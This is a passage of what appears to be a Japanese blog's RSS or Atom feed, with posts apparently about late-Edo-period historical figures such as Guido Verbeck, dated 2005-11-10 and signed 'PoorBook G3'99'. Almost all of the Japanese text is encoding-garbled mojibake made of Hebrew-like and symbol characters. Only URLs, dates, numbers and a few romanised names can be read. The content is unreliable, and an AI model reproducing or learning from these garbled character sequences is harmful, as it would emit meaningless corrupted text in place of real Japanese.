    -¡¡½₪¸³ֶ»₪ג₪₪¿¡¢½ֵֽ׳₪ָכֱֵָכ½ׁ₪ֿ¸‎ֱֵ₪ַ₪¢₪ֳ₪¿₪ָ₪₪₪¦¡£₪₪«₪־½¡ַֹ₪ֻ₪¯₪י₪₪כ₪ָ¡¢¸¸¥₪ָ₪·₪ֶµ­ֿ¿₪¹₪כ₪ָ₪₪₪¦´·½¬₪¬¾¯₪₪₪¡£₪₪ֳ₪¿₪¯µ­ֿ¿₪¬₪₪₪₪ן₪±₪ַ₪ֿ₪₪₪₪·¡¢ְ׀ָך₪ה³¨»¥₪₪ֹ₪־₪«₪¿₪ֱ₪ַ»ִ₪ֳ₪ֶ₪₪₪כ₪ג₪־₪ג₪¢₪כ₪ֻ₪ֿ₪¢₪כ¡£₪·₪«₪·¡¢₪ג₪ֳ₪ׁ₪י₪¬¸‎ֶ¬ֱֵ¾µ¡¥ױ¥©¡¼¥¯¥ם¥¢¡ֻ₪ַ₪¢₪כ¡£־ע»ֵֻ×₪ֻ²ֱֳֽ₪¬₪¢₪כ₪ָ₪₪₪ן₪ל₪ֶ₪₪₪כ₪₪₪ֳ₪₪¦₪ַ¡¢½₪¸³ֶ»₪ֻ₪ֿ₪¦₪µ₪ף₪¯₪µ₪¯₪ֶ¿®ֽׁ₪¹₪כ₪ֻ÷¬µע₪¬₪ָ₪₪·₪₪¡£₪₪¸₪ב₪¸¦µז¼װ₪¬°ֲ°׳₪ֻ₪ױ₪ל₪¿₪¬₪י₪÷¡¢²עְּ₪¬₪¹₪¹₪₪₪«₪ֳ₪¿ֽ‎ֽ³₪ֿ₪½₪³₪ֻ₪ג₪¢₪כ¡£
    -¡¡¸‎ֱֵ₪ַ₪ֿ¡¢ֵ׃ֳז₪ֶַֽׁ₪·₪¿₪ךָ´₪±ֽמ₪ֱ₪¿₪ך²ע¼ב₪¬ׁ₪ן₪ֳ₪¿₪ך₪·₪ֶ₪·₪₪₪¡¢ֻֽט₪־·ֱ₪¬ֱֵ¾µ₪ַ₪­₪₪₪₪־₪ַ₪ֿ₪₪₪₪«¡¢₪ָ₪₪₪¦₪ױ₪¦₪ִֻּ¾ן¹ֽ₪¨₪י₪ל₪כ¡£₪¿₪ְ₪·½₪¸³₪ַ₪ֿ₪ֹ₪¦₪ה₪י₪½₪¦₪ֿ¹ֽ₪¨₪₪₪₪י₪·₪₪¡£»‏ֲו₪¬ׁ₪ן₪ך¡¢₪ׂ₪ָ₪¬ׁ₪ן₪ך₪ז₪¯₪־₪ְ₪«₪י¡¢₪½₪ל₪ֻ₪·₪¿₪¬₪ֳ₪ֶ±µֱ₪ג₪₪¿₪¦₪ִ₪ם₪₪ׁ₪ן₪ֳ₪ֶ₪³₪½ֵצֱ³₪ַ₪ֿ₪₪₪₪«¡£₪½₪¦¹־ִךֵ×₪ֻ₪ָ₪י₪¨₪כ₪י₪·₪₪¡£₪¦₪ִ₪ם₪₪ׁ²½₪·₪ֶ₪ז₪¯₪³₪ָ₪ֻ₪³₪½¡¢±µֱ₪־±µֱ₪¿₪כ₪ז₪¨₪ף₪¬₪¢₪כ₪ָ¡£

    - -

    ¡¡₪₪ף₪ְ₪«¡¢½₪¸³ֶ»₪ֻ₪ִ₪₪₪ֶµ­½ׂ₪·₪ֶ₪₪₪כ₪ִ₪ג₪ך₪¬¡¢·ֻ¡ְֿµִ₪ָ¥·¥ף¥¯¥ם₪·₪ֶ₪·₪₪ֳ₪¿µ₪₪¬₪¹₪כ¡£²‏·ְֿ¼װ₪־¸ְ₪₪¬₪ֻ¹ף»ק₪·₪ֶ₪₪₪כ₪ט₪¦₪µ₪₪¬₪¹₪כ¡£₪ִ₪₪כ₪ָ₪³₪ם¡¢²‏·ְֿ¼װ₪ֲֿח¥¥י¿ב₪­₪־»³ֹת½₪¸³¼װ₪ָ₪₪₪¦·כְֿ₪«¡£₪ׂ₪ָ₪₪÷¡¢₪½₪¦₪₪₪¦¥×¥ֱ₪ָ₪₪₪¦₪³₪ָ₪ֻ₪·₪ֶ₪×₪­₪¿₪₪¡£
    -¡¡₪₪ס¢ֶַ×₪־½׀₪ֶ₪¯₪כ¸ֵֵµ₪ֻ¥°¥ך¥א·»ִן₪־¡ײַעְדֹ±¡׳¡¢¥·¥§¡¼¥¯¥¹¥װ¥¢₪־¡ײ¥ם¥¥×₪ָ¥¸¥ו¥ך¥¨¥ֳ¥ָ¡׳₪₪ֹ₪¬₪¢₪כ¡£₪₪¿¡¢»ׂ»¦₪·¡¦¿ֶ»¦₪·₪ֿ¡¢°¿ֽ»¦₪·₪ָ₪ָ₪ג₪ֻּ±ֲ¯³״₪־₪¢₪ִ₪«₪¦¥ֶ¡¼¥₪־₪ׂ₪ָ₪ִ₪ַ₪¢₪ך¡¢₪¦₪ײ₪ב¡¦±¸¼־₪ֶ¡¦²ָֹדִ¹ְ©¡¦ִֵּןְ©₪ָ₪₪₪ֳ₪¿¼ׂ²ס¥·¥¹¥ֶ¥א₪״¸ְµ₪עֵ¸³«₪¹₪כ²ִַ½ְ­₪ע»‎₪ֳ₪ֶ₪₪₪כ¡£ֶַ×₪ע»ׂ₪ֹ₪ג₪ֻ°₪₪»₪¿־ד₪ָ₪·₪ֶ₪ֿ°ֳֻ£ְ¯½¡₪־ל¡¦µֱֹ±₪¬₪¢₪כ¡£»ׂ₪ֻ»¦₪µ₪ל₪כ־ד₪ָ₪·₪ֶ÷״ֶ£ֶ»»°¡¢¿ֶ₪עִֹ₪¹₪כ־ד₪ָ₪·₪ֶֹנִֵ¿®¸¼₪¬₪¢₪כ¡£¼ך¸µ₪ֻ₪¢₪כ¡ײְִµ¸ֵ·±¸ֵ»צµ­¡׳₪ַ¡¢ֶַ₪ָ₪₪₪¦¸»ת₪ע¸¡÷ק₪·₪ֶ₪₪¿₪־₪ְ₪¬¡¢³÷ֵצ¸»ת₪ֿ³§ּµ¡£

    - -

    ¡¢¨ִֹµ­¡§₪³₪־¸¶¹ֶ₪¹₪₪ֶ´¶¾נֵ×₪¹₪®¡£₪ג₪ֳ₪ָ₪ֱ₪¬₪¦¹½ְ®₪¬₪¢₪ֳ₪¿₪ֿ₪÷¡ֻ
    -¡¡
    -¡¡¡‏»²¹ֽ
    -¡¡ֱףֵ·¹ֽ¡§ֱףֵ·¹ֿׂ©¹ֽ»¡¥µ¥₪¥ָ
    -¡¡http://www.h2.dion.ne.jp/~soutenko/top.html
    -¡¡¡״ֱףֵ·¹ֿׂ©¡²¦¶ױְֲ¡¦ֽ³״¿־¡₪¹ײֳּ¼ׂ
    -¡¡¡״¶ץ³₪₪־ֹק·¡»ַֿ־ְֲֻֿ÷¡₪ֳז±¸רְֿ¼ׂ
    -¡¡
    -¡¡
    -¡¡
    -¡¡2005.11.10
    -¡¡₪·₪ְ₪ׂ₪ם₪·¡¿PoorBook G3'99
    -¡¡ֵ¾÷¡¦°תֽׁ¡¦¥ך¥ף¥¯₪ֿ¼«ֽ³₪ַ₪¹¡£

    ]]> -
    -technology -PoorBook G3'99 -2005-11-10T00:40:11+09:00 -
    - -ֻכֹ·³´ֱֿא־‎½ך -http://www.siesta.co.jp/aozora/archives/002383.html - -¡¡־¶ַֿ¹¥₪­₪¬₪₪₪י₪ֳ₪·₪ד₪כ₪ט₪¦₪₪־₪ַ¡¢₪½₪־¼‏ױ₪ָ¾±ֶג₪־₪³₪ָ₪₪ֹ¡£
    -¡¡¸µ׳ֶףַ¯¡1862¡ֻ÷הֻ־¶ַֿ₪¬³₪½®ּח²¼₪ֶֻ‏₪ך₪₪¹¡£־µַֿ¡¢ֶף½½ָ¬÷ֽ¡£ְיֽױ½ְֲֵֿ÷₪ָ₪ָ₪ג₪ֻ³₪½®₪ע»ֲ¡₪­¡ֻ₪ך₪ֻ¹װ₪ֳ₪ֶµױ₪ֻ´¶²½₪µ₪ל₪כ¥¨¥װ¥½¡¼¥ֹ₪ֽֿ­ּ¾¡£³₪½®₪ֿ־¶ַֿ₪י₪¦₪µ₪ף₪¯₪µ₪₪ֳ¦ָֽֿ²¿ֽ₪ע₪¢₪ִ₪ב₪ֶ¿ְ¸ֽ₪ֻֻכֹ₪־·³´ֱֿא־‎½ך₪ע₪ִ₪¯₪כ¡£₪½₪־¸וֱא־‎½ך₪¬²ע»¶₪·₪¿₪¢₪ָ¡¢₪ׂ₪ָ₪ִ₪ֿ־¶ַֿ₪ׂ₪­₪₪₪כ³₪±חֲג₪ָ₪₪ֳ₪ֶ»§ִ¹ֶ±ֱּ₪ֻ°לּעַד₪₪¡¢¾¦¼ׂ₪״₪־ֶ»₪ע₪¿₪ֹ₪כ₪³₪ָ₪ֻ₪₪כ¡£₪ג₪¦°ל‎₪ֿ±ֹֻנָֽ₪־°ת₪­₪ִ₪ל₪כµלֻכ»ִֵ₪ָ₪₪ֳ₪ֶָ¡´¡¦¸־ַ³װ₪״¸‏₪«₪₪¡¢ךֳ₪ְןֱט₪־ֻכ°ת₪­ּע₪ע₪ֻ₪₪¦¡£₪½₪־₪־₪ֱ₪גֶֻ¶ב³₪₪עֹֻ±ׂ₪¹₪כִכ¹ס³₪·³₪״₪ֶָ»₪ע₪¢₪ז₪א¡£¡ֽ׳³־ַ§¡ֻ
    -¡¡־¶ַֿ₪ה³₪½®₪¬½׀±©₪ה¾±ֶג₪״ֽט₪¿₪ָ₪₪₪¦µ­ֿ¿₪ֿ₪¢₪ך₪₪»₪ף¡£₪×₪½₪י₪¯ֶף¿ֽ₪ָ₪גֽט₪¿₪³₪ָ₪ֿ₪₪₪¡£₪ָ₪³₪ם₪¬·³´ֱֿא־‎½ך₪־¥ב¥ף¥׀¡¼₪ע¸«₪ֶ₪₪כ₪ָ¡¢₪±₪ֳ₪³₪¦¾±ֶג½׀¿ָ¼װ₪¬₪₪₪¿₪³₪ָ₪ֻ₪×₪ֹ₪ם₪«₪µ₪ל₪₪¹¡£÷£²ף₪ֿ¸½»‏ְֵ₪ַ₪ן₪«₪ֳ₪¿₪ָ₪³₪ם₪₪ַ₪ע₪«₪₪₪ִ₪₪ף₪ַ¥ב¥ג₪·₪ֶ₪×₪­₪₪¹¡£
    -

    ]]> -¡¡ֹ®ֶ¬₪ֿ÷´ֶ£ֽ¿ַ·½ץ¡£ְ¯ֽ¡₪₪µ₪ט₪·¡ֻ¡£¾±ֶגָֽֽ·÷´¾£ְמ½׀¿ָ¡£ְַ²ָ₪־½׀¡£ֽ¿ַ·½ץ₪ֵֿחִֵ¸׳ַ·½ץ₪־¾ׂ²נ₪ַ¾¡₪־ּחִן₪ֻ₪₪כ¡£ֵחִֵ₪ּֿ¾₪־ֳ־₪י₪ל₪¿·ץµׂ¡£¾±ֶג₪ֻֽט₪ֶ·ץµ»₪עָהֿ×₪·₪¿₪ָ₪³₪ם¡¢ֽ¿ַ·½ץ₪¬ִן»ֶׂ‏₪ך₪ע´ך₪ֳ₪¿₪י₪·₪₪¡£₪·₪«₪·¡¢ִן»ׂ₪ֿ₪ָ₪י₪₪₪₪ֳַָ₪י₪ל₪כ¡£₪½₪־₪«₪ן₪ך₪ֻ¹¾¸ֽ₪־¾¡³₪½®₪ע¾ׂ²נ₪µ₪ל₪כ¡£¾®ְג¡״ֲחמ»§ֶ½¡₪ֻ₪ֵֿחִֵ¸׳ַ·½ץ₪¬ֵ׀¾ל₪·₪₪¹₪¬¡¢ֽ¿ַ·½ץ₪ֻ´״₪¹₪כµ­½ׂ₪ֿ₪ֱ₪ח₪ֳ₪ָ¸«₪ִ₪±₪י₪ל₪₪»₪ף₪ַ₪·₪¿¡£
    -¡¡°ְֲ¯¸µַ¯¡1854¡ֻ»°½½»ֽ÷ֽ₪־₪ָ₪­₪ֻ¾¡₪־½־₪ֶֻ‏ּח¡£ֽצ¸ל₪הֻ₪½ׁ₪ע³״₪ײ¡£₪½₪ל₪«₪יִ¹÷ך₪ַ³₪·³ֱֵ½¬ְ¸₪ָ₪·₪ֶ¥ױ¥כ¥¥ֳ¥­₪«₪י·³´ֱֿא־‎½ׁ₪הֲ¬־ּ½ׁ₪ע₪₪₪ײ¡£ֻ±ה¸µַ¯₪ֻ¾¡₪¬ׂש־׳´₪ֵֶַֿ₪־₪µ₪₪₪ֿ¡¢₪½₪־־±¼י₪ע₪¢₪÷₪«₪כ¡£ֻכֹ₪«₪י₪־ּ¿₪ַֽצ½סֻּץ‎₪ע₪ג₪ִ₪ָ₪ב₪כ¡£¾¡₪ֻ²£ֹֽ₪־³«¹ֱ₪ע¸¥÷צ₪·₪¿₪־₪גֽ¿ַ·½ץ₪ְ₪ֳ₪¿₪י₪·₪₪¡£־¶ַֿ₪¬ּח²¼₪ֶֻ‏₪ֳ₪¿₪ָ₪­¡¢ֽ¿ַ·½ץ₪ֿ»ֽ½½°ל÷ֽ¡£־¶ַֿ₪ֿֿ²¿ֽ¡£ֽ¿ַ·½ץ₪ֿ¾±ֶגָֽ»־¿ָ¬¡£
    -¡¡ֽ¿ַ·½ץ₪ֿ½×»ֿ°ל´׃¡¢·°׀±¿ֶ°₪ָ₪ֿ°לְ‏₪ע²ט₪·₪ֶ´״ֽ¿₪·₪₪«₪ֳ₪¿₪ָ₪₪₪¦¡£°¿·₪־ֶ°ֽנ₪־₪₪«₪ַ¾±ֶגָֽ₪¬₪½₪־±²ֳז₪ֻ₪¢₪ֳ₪¿₪ָ₪­₪ג¡¢³₪½®₪־₪½₪׀₪ע₪ֿ₪₪ל₪₪«₪ֳ₪¿₪ט₪¦₪ְ¡£ְּ¼£»ַֽ¯¡¢ּ±ֹפ¾½׀»ֵֵ´ֶ»½ץ₪ַֻ₪₪¸₪י₪ל¡¢¿·¶¶¡¦²£ֹֽ´ײֵ´ֶ»₪־ְֹ₪ֻ₪ִ₪ָ₪ב₪כ¡£ֽגַ¯³«¶ָ¡£ְּ¼£¶וַ¯₪´₪ם₪«₪יֲֹµ₪₪¬₪ֱ₪ֻ₪₪ֳ₪ֶַ·כ³ֻ₪־₪¿₪ב¾¡³₪½®ֲנ₪ַµְֲ₪¹₪כ¡£µ‎ַ¯¸½½¼·¡£

    - -

    ¡¡¿ש µ‎ֶף¡£¾¡½־₪־½־ִ¹₪ע₪ִ₪ָ₪ב₪¿₪ָ₪₪₪¦₪«₪י¡¢ֽ¿ַ·½ץ₪ֶָ±ַ¯ֲו₪ְ₪ם₪¦₪«¡£½׀¿ֳָֿ₪₪ֹ₪¯₪ן₪·₪₪₪³₪ָ₪ֿ₪₪ְִ´₪₪ֶ₪₪»₪ף₪¬¡¢ּ¼¡¦־₪»ׂ₪¬ִב²¬₪־¾®ְג²ָ¡¦¹ג»³ֳפµם₪־÷₪ָ₪₪כ¡£
    -¡¡÷§°ש´״·¸₪ַ₪₪₪¨₪׀¡¢±ֹֻנָֽ₪־÷¡¦₪¿₪ִ₪ֻֿכֹ±°ו»ױ¡¦־׃ֶ¶³₪₪־ּ¼₪ַ₪¢₪ך¡¢־׃ֶ¶³₪₪ֿ¾¾ֻ־ֹ½ח¡¦־׃ ·°¡¦÷´ֶ£ֱֲ³₪י₪ָ₪ִ₪₪¬₪כ¡£ָא₪י₪ֿ¾±ֶגֽ·÷´¾£ְמ½׀¿ָ¡¦ֵ·µֱּ±₪ָ₪ט₪׀₪ל₪¿÷´ֶ£ֶ£÷´¡₪ָ₪¦₪¹₪±¡ֻ₪־»ֲׂ¹¡£
    -¡¡¹גּ»°ֿ÷¡£µלְ«¡¢¹ץִֵֽ§·ֹ¡£¹¾¸ֽ½׀¿ָ₪־¾±ֶגָֽ»־¡£ֵ·½½ֶףַ¯ְ¸₪₪ל¡£ֽ¿ַ·½ץ₪ָ₪ֶֿף½½÷ֽ₪ֱ₪¬₪¦¡£₪³₪ֱ₪י₪ֿ¾±ֶגְָֽ₪»ֳׂי½ת₪־ֱך¼ךּע₪ע₪ִ₪ָ₪ב₪ֶ₪₪₪כ¥¨¥ך¡¼¥ָ¡£°ְֲ¯ֿ»ַ¯¡¢ָּֽ¿₪ע¼ץ₪±₪ֶ¾¡₪־·³´ֿ·«־‎½ך₪ֶֻ‏₪כ¡£°¿§₪₪־₪ֿךֳ₪ְןֱט₪־ֱ°ַ¯¡¢·ִ±‏»°ַ¯»ֽ·מ₪ֻ¥¢¥ב¥ך¥«₪״־±³״¡£ְּ¼£¸ַ¯ֶף·מ₪ֶֻ¹ס÷־±ּ³»ָ´½סµ­¡£¥µ¥ף¥ױ¥י¥ף¥·¥¹¥³ֹ־־»צ¡¢¥ֻ¥ו¡¼¥ט¡¼¥¯־־»צ₪ָ₪₪כ¡£₪ֹ₪¦₪ה₪י°¿·₪־ְן²׀₪ֻ₪₪­₪³₪₪ל₪₪«₪ֳ₪¿₪י₪·₪₪¡£ִ¹₪¯¥¢¥ב¥ך¥«₪ֳֻף־±₪·₪ֲֶ׀ְֶ¾׳₪ֻ₪ִ₪ָ₪ב₪ֶ₪₪₪כ¡£»ְָבֳִ₪¬½׀₪«₪±₪כ₪µ₪₪₪־¸½ֳֿ¼ךַּע₪ָ₪₪₪ֳ₪¿₪ָ₪³₪ם₪«¡£½½»°ַ¯₪ֻ´±₪ע¼­₪·₪¿₪¢₪ָ₪ְֿ¸»ו₪־ֽ¢½׀¶ָ₪ע₪ֿ₪¸₪ב₪ֶ₪₪₪כ¡£µ‎ַ¯ֿ»½½¶ו¡£

    - -

    ¡¡₪³₪³₪ַ¥ױ¥כ¥¥ֳ¥­₪ֻ₪ִ₪₪₪ֶ¡£Verbeck, Guido Herman Fridolin¡£1830ַ¯ְ¸₪₪ל¡£¥×¥י¥ף¥ְ¡¢¥ז¥ָ¥ל¥ׂ¥ָ½׀¿ָ¡£¥¢¥ב¥ך¥«₪־¥×¥י¥ף¥ְ²‏³׳ַֹ¶¨²ס₪«₪יְכ¶µ»ױ₪ָ₪·₪ֶַֹ¸¯¡£°ְֲ¯ֿ»ַ¯¡1859¡ֻֽטֶ¡£ִ¹÷ך₪ה÷´²ל₪ַֹ¶µ₪־₪«₪¿₪ן₪י±ׁ¸ל¶µ»ױ₪ע₪ִ₪ָ₪ב₪כ¡£ְלּח₪ֿ¹©³״¡£¥ױ¥כ¥¥ֳ¥­₪«₪י¶µ₪¨₪ע₪¦₪±₪¿¼װ₪ֲֿ¿₪₪¡£°ֶֻ£ַמ¸¡ִ¹½£¡ֻ¡¦ֲחµ׳ֽרִּ¡»§ֻא¡ֻ¡¦ֲח·¨½ֵ¿®¡ִ¹÷ך¡ֻ¡¦ֵֹח¼ן¿ֳ¡÷´²ל¡ֻ¡£ְּ¼£31ַ¯ֵלµ‏₪ֻ₪ֶֻ׳₪¹₪כ¡£
    -¡¡ֻ´ײ·´¼±ׂ¡£₪×₪½₪י₪¯»³·ֱ₪ַ₪גֳ־₪כ¿ֽ₪ֿ¾¯₪₪₪¡£¹ז₪עֻֻּֽ¡₪₪¯₪ט₪¦¡ֻ₪ָ₪ג₪₪₪¦¡£¸ְ¯¸ַ¯¡1822¡ֻ¼עְִֵ¸₪₪ל¡£ֽ¿ַ·½ץ₪־°ל÷ַֽ¯²¼₪ֻ₪₪כ¡£ְ«₪«₪י»¡₪·₪־₪ִ₪¯₪ָ₪×₪ך¡¢¼עִֵ₪־ֲחֹ¹כֻ´ײ²ָ₪־¬²ָ¶₪ֻ₪¢₪¿₪ך₪₪¹¡£½½¼·÷ֽ₪ַ¹¾¸ֽ₪ֻ½׀₪ֶ₪«₪י¡¢ֽצ³״₪ע³״₪׃¡¢ִ¦¹ן₪ע³״₪׃¡¢₪µ₪י₪ֻ³כ¾‏ֻּ÷״₪«₪י³¨₪ע³״₪ף₪ְ₪ָ₪₪₪¦¡£₪³₪ל₪ְ₪±₪ַ₪ג₪«₪₪ך¥ָ¥ך¥ֳ¥­¡¼¡£°ְֲ¯ֶףַ¯¡1855¡ָֻ½סִ´½ך₪ֻ₪ֶֽ־³״₪־ֻּץ₪ֻ½¾»צ₪·₪ֶ°¹¡¢¾¡½־₪־ֽצ³״¶µ»ױ₪ע₪ִ₪ָ₪ב₪כ¡£ֽ¿ַ·½ץ₪ָ₪₪ֶ±´¡£ִ¹÷ך³₪·³ֱֵ½¬½ך₪־ִּּץ₪ָ₪₪ך¡¢¥ױ¥כ¥¥ֳ¥­₪«₪י±ׁ¸ל₪ע½¬₪¦¡£¸µ׳ֶףַ¯¡1862¡ֻ²₪ֶ₪הְ¶¹ס₪ע½הֽ·¡£₪µ₪י₪ֻ¼¯»שֵח³«ְ®½ך₪־¶µ»ױ₪ע₪ִ₪ָ₪ב₪כ¡£·ִ±‏ֶףַ¯¡1866¡ֻ³«ְ®½ך₪ע¼­₪·ֲח÷ו₪ַ¶׀²¦±¿ֶ°₪ע²ט÷צ¡£¼עִֵ₪״ּב₪ֳ₪¿₪ָ₪³₪םב₪י₪ן₪ל¡¢ִב²¬₪־¿ְֶּ‎₪ֻֽ©ֳִז»אֻ´¡£·ִ±‏»ַֽ¯ֻ׳¡£µ‎ַ¯»ֽ½½¼·¡£°לְג₪ֶַֻ»¦₪ָ₪ג₪₪₪ן₪ל₪כ¡£
    -¡¡ְײֲפָ»ַ·½ץ¡₪ֿ₪ה₪־₪¹₪±¡ֻ¡£1839ַ¯ְ¸₪₪ל¡£¹גּ»°ֿ÷₪־ֶף÷ַֽ¯¾ו¡£¾±ֶג½׀¿ָ¡£°ְֲ¯ֿ»ַ¯¡1859¡ֻ³₪·³·«־‎½ך₪ֶֻ‏₪ך¾¡₪־»״ֶ³₪ע¼ץ₪±₪כ¡£ֽ¿ַ·½ץ₪ה·´¼±ׂ₪ט₪ך₪ג₪¢₪ָ₪ְ₪¬־¶ַֿ₪ט₪ךְט₪־ֶ‏½־¡£·ִ±‏ֶףַ¯½½ֶף·מ¾¡½־₪ַבַ₪µ₪ל₪כ¡£¾±ֶג₪ֱֻק₪י₪ל₪ֶֿ´ֶג₪ֳַַ¿©₪·₪ֶ»אֻ´¡£µ‎ַ¯ֶף½½¶ו¡£₪ִ₪₪ך÷´ֶ£ֽ¿ַ·½ץ₪ה¹גּ»°ֿ÷₪¬·ֳ₪₪ל₪ֶ½׀ְ₪₪ַ₪­₪¿₪־₪ֲֻ׀₪·₪ֶ¡¢ֻ´ײ·´¼±ׂ₪הְײֲפָ»ַ·½ץ₪י₪ֶֿ±¶¿½׀¿ָ₪ֻ₪ג₪«₪«₪ן₪י₪÷¡¢ְ¨»´₪÷ַ´₪ע₪ָ₪²₪כ₪³₪ָ₪ֻ₪₪כ¡£ְ¨»´₪¿ְֽ¸₪ָ₪₪₪¦ְֵ₪ַ₪ֿ¡¢¸ו¼װ₪ְֻ¶²ָֿ¬ֿ÷₪הִן¡¦÷״ֶ£·§»°ֿ÷₪ע²ֳ₪¨₪ֶ₪ג₪₪₪₪₪«₪ג₪·₪ל₪₪₪¡£
    -¡¡²סִֵָֽ₪־₪ט₪¦₪ֻֿ·¼דֳֻ½ק₪¬»אֶ®₪·¡¢₪₪×₪«₪ִֵֶֽמ₪״¶¯ְ©°½»₪µ₪»₪י₪ל₪¿₪³₪ָ₪ֻ₪¯₪י₪₪כ₪ָ·כ²ֵּ×₪ֻ₪ַ₪ֿ₪¢₪ֳ₪ֶ₪ג¡¢¾±ֶגָֽ₪ֿ₪ב₪°₪₪ל₪ֶ₪₪₪כ¡£₪·₪«₪·₪½₪־±ֶ₪ֻ¡¢₪×₪ג₪ֶ₪ֻ₪µ₪ל₪÷₪ֻ°ֵ₪ֱֻע₪י₪ל₪¿¼װ₪¿₪ֱ₪¬־¡¹₪ָ₪₪₪כ₪³₪ָ₪ֻµ₪₪ֵ₪«₪µ₪ל₪כ¡£ֵצֳֿ½׀¿ָ¼װ₪׀₪«₪ך₪ַ₪₪₪¡£¾±ֶגָֽ₪¢₪÷₪«₪ך₪ְ₪ֳ₪¿¿·ִ§ֱָֿ²»־₪¿₪ֱ₪ֿ¡¢÷ַ¸ו₪₪ַ¾±ֶגָֽ»־₪י₪ָ¹װֶ°₪ע₪ָ₪ג₪ֻ₪·₪ֶ´±·³₪ֻ₪¢₪י₪¬₪ֳ₪¿₪ֻ₪ג₪«₪«₪ן₪י₪÷¡¢ּµ»´₪·כֻצ₪ֻ½×₪ן₪ֳ₪ֶ₪₪₪כ¼װ₪¿₪ֱ₪¬¾¯₪₪¯₪₪₪¡£ִ´₪₪ל₪׀ִ´₪₪כ₪₪ֹ₪½₪¦₪₪₪¦¿ֽ×₪¿₪ֱ₪¬¸½₪ל₪ֶ₪¯₪כ₪־₪ְ¡£
    -¡¡¡״±±©±־ףֶָֽ±ֱּ¡¡ֵלְֶֻ¯ֹ¼ש־©₪־ּ´¡¡ֳז¸ר¿·½ס,1995¡ֻ₪־₪¢₪ָ₪¬₪­₪עְ±־¼°ל₪ֿ¡ײֶֻ₪־ְן¸ו½טֽ‎₪־₪₪÷₪µ₪ֲֿטֶף¼¡ְ₪³¦ֲחְן₪ַ₪ג»״ֵ¦₪µ₪ל₪ֶ₪₪₪כ₪¬¡¢ךֳ₪ְןֱט₪ַ₪ג₪₪ֳ₪¿₪¯ֶ±₪¸₪ַ¡¢ֲ±·³₪־ּ¾₪ַ±±©±₪ע°ל‎ֵ×₪ֹֻׂױ₪±¡¢ֶֻ₪־¶בֲו»ֻ₪ֻ₪ָ₪ֳ₪ֶ¡¢ךֳ₪ְןֱט₪ָ₪ֿ°לֲ־₪₪ף₪ְ₪ֳ₪¿₪־₪«₪ע½½¬₪ֶֻ₪µִ¡¦¸¡¾₪¹₪כ₪³₪ָ₪₪¯¡¢־ע»ֻ₪־°ַ₪ֱֻע₪ֳ₪ֶ₪·₪₪ֳ₪¿¡£₪³₪ל₪ֶֻֿ¿ֽ₪־ֳׁ₪÷₪₪­־ע»ֻ´¶³׀₪ַ₪¢₪כ¡׳₪ָ¶¯₪₪¸‎ִ´₪ַ₪·₪ב₪¯₪¯₪ֳ₪ֶ₪₪₪כ¡£ֲ±·³₪־ּ¾₪ַ±±©±₪ע°ל‎ֵ×₪ֹֻׂױ₪±₪ֶ₪₪₪כ₪־₪ֿ¡¢¾¡¼װ₪־ֲ¦₪׀₪«₪ך₪ַ₪ֿ₪₪₪¡£ַװְן₪·₪¿ֲ¦₪ג₪₪¿¡¢₪¸₪ײ₪ף₪¿₪ֱ₪־²בµמ₪עֱע₪ךµמ₪ם₪¦₪ָ₪·₪ֶ₪₪₪כ¡£ךֳ₪₪ַ־®₪ל₪¿·ל¡£²­ֶל¡¦¹­ֵח¡¦ִ¹÷ך₪ַ־®₪ל₪¿·ל¡£°ֲֶ®ֱט¡¦³״ְ¸¶ֱט₪ַ־®₪ל₪¿·ל¡£¸½÷¹סֶג³°₪ַ־®₪ל₪ֶ₪₪₪כ·ל¡£₪₪®₪ל₪ג₪₪₪¥ך¥ױ¥ל¥₪¥ף¡£

    - -

    ¡¡־¦±½¡¸ק¡£ֵ÷´½׀¿ָ₪ַ־¶ַֿ₪־ִן³ µ×½£ָֽ½׀¿ָ₪ַ³₪±חֲג½ךֲ°¡£₪¢₪י₪¿₪ב₪ֶ₪₪₪¦₪₪ַ₪ג₪¢₪ך₪₪»₪ף₪¬¡¢ֱןְּ₪ְַו₪ֻֽ¥₪ל₪־₪ֱ₪ֻ³°ּ³ֲח¿ֳ₪ע₪ִ₪ָ₪ב₪כ₪³₪ָ₪ֻ₪₪ך₪₪¹¡£ְּ¼£½½°לַ¯ְ¾ֶמְןֱט₪־₪¯₪ן₪ְ₪ֶ₪¬ּ₪ֱ³₪ָֻ¯³׀₪·₪ֶ₪ָ₪י₪¨₪י₪ל»³·ֱ₪־´ֶ¹צ₪״ֵך₪¼₪י₪ל₪כ¡£±ף‎־®÷ב₪־₪ט₪¦₪₪ג₪־₪ְ₪ם₪¦₪«¡£½½ֶףַ¯½½°ל·מ₪ְֻחֲז₪־´ֶ¹צ₪״°ֶ°₪¹₪כ₪₪ַ₪־₪¢₪₪₪ְ¡¢»³·ֱ־¹ֿ¶ִ®־¹´ִג¼ח¡¦¸וֶ£ֻפ¼±ׂ₪¬°ב¿©ֵש¿ָױ₪־÷¹₪·ֶ‏₪ל₪ה²ֲָ²₪ָ₪־ֿ¢ֽם₪₪ֹ₪־ְ₪ֳֿ₪ע₪ִ₪ָ₪ב₪ֶ₪₪₪כ¡£½¡¸ק₪ֿ¹צֳז₪ַ¥¥ף¥µ¥א¡״¥׳¥ך¥ף¥·¥׳¥כ¥¹¡¦¥×¥ױ¡¦¥ג¥י¥כ¡¦¥¨¥ף¥ֹ¡¦¥ל¥¸¥¹¥ָ¥ל¡¼¥·¥ח¥ף¡₪־ֻּץ₪₪ֹ₪ע¼ך₪¬₪±₪כ¡£½½¸ַ¯½½ֶף·מ¡¢ֳֶ¼ָּֿ₪µ₪ל½׀¹צ¡£
    -¡¡´״¸‎־´µָ¡₪¿₪«₪ט₪·¡ֻ¡£¹¾¸ֽ½׀¿ָ₪־ֻכ¿ֳ¡£₪³₪־¿ֽ×₪ג÷£¸ו₪־₪¯₪ן₪·₪₪ִ´÷÷₪עֽ׳₪·₪₪¹¡£¹¾¸ֽ¶וֳ÷ה₪ַ¾¡³₪½®₪ע°ֵ»¦₪·₪ט₪¦₪ָ₪·₪¿₪³₪ָ₪¬₪¢₪כ₪י₪·₪₪¡£ךֳ₪»‏¡¢־״²¦»µ₪עֽ₪·₪ֶ₪־µֱµף·׳²ט₪ַ₪ֳֿז·³»²ֵֻ₪ֻֽ½ִך₪µ₪ל₪¿₪ָ₪ג₪₪₪¦¡£°¿·¸ו¡¢»³·ֱ¡¦»³¸‎¡¦ְֵ²¬₪₪ֹ₪־¸©־ב₪ע₪ִ₪ָ₪ב₪כ¡£
